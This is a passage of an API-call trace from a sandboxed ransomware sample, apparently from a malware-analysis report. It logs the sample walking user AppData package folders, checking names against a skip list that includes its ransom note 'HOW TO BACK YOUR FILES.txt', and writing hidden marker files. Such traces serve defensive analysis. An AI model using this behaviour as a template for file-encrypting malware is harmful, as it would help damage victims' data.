[0065.188] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.188] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x702cd265, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702cd265, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf02c0298, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0065.188] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.188] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.188] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.188] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.188] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x702cd265, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x702cd265, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf02c0298, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.188] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.188] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.188] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.188] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.188] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.188] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf02c0298, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf02c0298, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf02e654a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.188] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.188] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.188] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf02c0298, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf02c0298, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf02e654a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0065.188] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0065.189] lstrcpyW (in: lpString1=0x130ec10, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.189] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secureassessmentbrowser_cw5n1h2txyewy\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0065.189] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0065.189] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0065.190] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0065.190] CloseHandle (hObject=0x2cc) returned 1 [0065.190] CloseHandle (hObject=0x2a0) returned 1 [0065.190] GetCurrentThreadId () returned 0xd98 [0065.190] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x11d108 [0065.190] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy" [0065.190] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11de60 | out: hHeap=0xe0000) returned 1 [0065.190] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11d100 | out: hHeap=0xe0000) returned 1 [0065.190] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy" [0065.190] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\" [0065.190] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" [0065.190] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.secondarytileexperience_cw5n1h2txyewy\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0065.193] WriteFile (in: hFile=0x2a0, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0065.196] FlushFileBuffers (hFile=0x2a0) returned 1 [0065.197] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0065.197] CloseHandle (hObject=0x2a0) returned 1 [0065.197] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy") returned 94 [0065.197] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.197] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8333af6e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x70e206ba, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf02e654a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0065.197] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.198] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.198] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0065.198] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.198] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8333af6e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x70e206ba, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf02e654a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.198] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.198] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0065.198] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0065.198] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.198] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.198] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf02e654a, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf02e654a, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf02e654a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0065.198] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.198] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0065.198] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x833d38ba, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x377598d9, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x377598d9, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0065.198] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.198] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.198] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0065.198] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0065.198] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0065.198] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0065.198] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0065.198] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0065.198] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0065.198] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0065.198] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0065.198] lstrcpyW (in: lpString1=0x130ebf6, lpString2="AC" | out: lpString1="AC") returned="AC" [0065.198] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0065.198] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc4) returned 0x116930 [0065.198] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x11cd68 [0065.198] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833ad684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd10808b3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x833ad684, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0065.198] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0065.198] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.198] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0065.199] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0065.199] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0065.199] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0065.199] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0065.199] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0065.199] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0065.199] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0065.199] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0065.199] lstrcpyW (in: lpString1=0x130ebf6, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0065.199] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122200 [0065.199] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xce) returned 0x108760 [0065.199] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122208 | out: ListHead=0xf68b0, ListEntry=0x122208) returned 0x122368 [0065.199] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833ad684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd1080f06, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x833ad684, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0065.199] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.199] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.199] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0065.199] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0065.199] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0065.199] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0065.199] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0065.199] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0065.199] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0065.199] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0065.199] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0065.199] lstrcpyW (in: lpString1=0x130ebf6, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0065.199] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0065.199] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd4) returned 0x11c148 [0065.199] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121f88 | out: ListHead=0xf68b0, ListEntry=0x121f88) returned 0x122208 [0065.199] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8333af6e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd10812d1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8333af6e, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0065.199] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.199] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.199] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0065.199] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0065.199] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0065.200] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0065.200] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0065.200] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0065.200] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0065.200] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0065.200] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0065.200] lstrcpyW (in: lpString1=0x130ebf6, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0065.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0065.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd4) returned 0x11c068 [0065.200] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x121f88 [0065.200] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8336128a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd10816d1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8336128a, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0065.200] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.200] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.200] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0065.200] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0065.200] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0065.200] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0065.200] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0065.200] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0065.200] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0065.200] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0065.200] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0065.200] lstrcpyW (in: lpString1=0x130ebf6, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0065.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122180 [0065.200] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd8) returned 0x11b508 [0065.200] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122188 | out: ListHead=0xf68b0, ListEntry=0x122188) returned 0x1222c8 [0065.200] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833ad684, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x712f2959, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x712f2959, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0065.200] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.200] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.200] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0065.200] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0065.200] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0065.200] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0065.200] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0065.201] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0065.201] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0065.201] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0065.201] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0065.201] lstrcpyW (in: lpString1=0x130ebf6, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0065.201] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122220 [0065.201] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd0) returned 0x108838 [0065.201] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122228 | out: ListHead=0xf68b0, ListEntry=0x122228) returned 0x122188 [0065.201] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x70e206ba, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x70e206ba, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x70e206ba, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0065.201] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.201] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.201] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0065.201] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0065.201] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0065.201] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0065.201] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0065.201] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0065.201] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0065.201] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0065.201] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0065.201] lstrcpyW (in: lpString1=0x130ebf6, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0065.201] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0065.201] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xda) returned 0x125658 [0065.201] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x122228 [0065.201] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8336128a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd111a2b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8336128a, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0065.201] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0065.201] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0065.201] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0065.201] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0065.201] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0065.202] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0065.202] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0065.202] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0065.202] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0065.202] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0065.202] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0065.202] lstrcpyW (in: lpString1=0x130ebf6, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0065.202] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0065.202] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd2) returned 0x11bc08 [0065.202] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x122248 [0065.202] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8336128a, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd111a2b6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8336128a, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0065.202] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0065.202] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0065.202] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.SecondaryTileExperience_cw5n1h2txyewy\\HOW TO BACK YOUR FILES.txt" (normalized: 